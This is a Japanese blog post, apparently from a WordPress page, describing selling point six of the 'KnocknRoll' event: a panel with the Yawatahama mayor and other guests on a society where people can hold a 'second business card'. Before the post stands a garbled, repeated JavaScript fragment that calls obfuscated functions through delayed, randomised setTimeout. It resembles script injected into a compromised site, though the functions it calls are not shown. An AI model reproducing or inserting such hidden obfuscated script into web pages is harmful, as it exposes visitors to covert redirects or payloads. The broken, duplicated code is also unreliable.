「KnocknRoll」8つのセールスポイント part6

andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}無題6

6.「第二の名刺が当たり前に持てる社会」について考えることができる! <第二の名刺を考えたい>
KnocknRollの最終目標は「第二の名刺を当たり前に持てる社会をつくること」です。若者等が堂々と活動を続けていくためには、社会全体として、働き方や生き方を考えていく必要があると考えています。八幡浜市長大城一郎氏、伊予銀行○○○○氏、前田眞氏、イケダハヤト氏にご登壇いただき、行政、企業、NPO等それぞれの立場から、その可能性について、議論を行っていただきます。この豪華なゲストの議論は必見ですね!

コメントを残す

メールアドレスが公開されることはありません。 * が付いている欄は必須項目です

次のHTML タグと属性が使えます: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>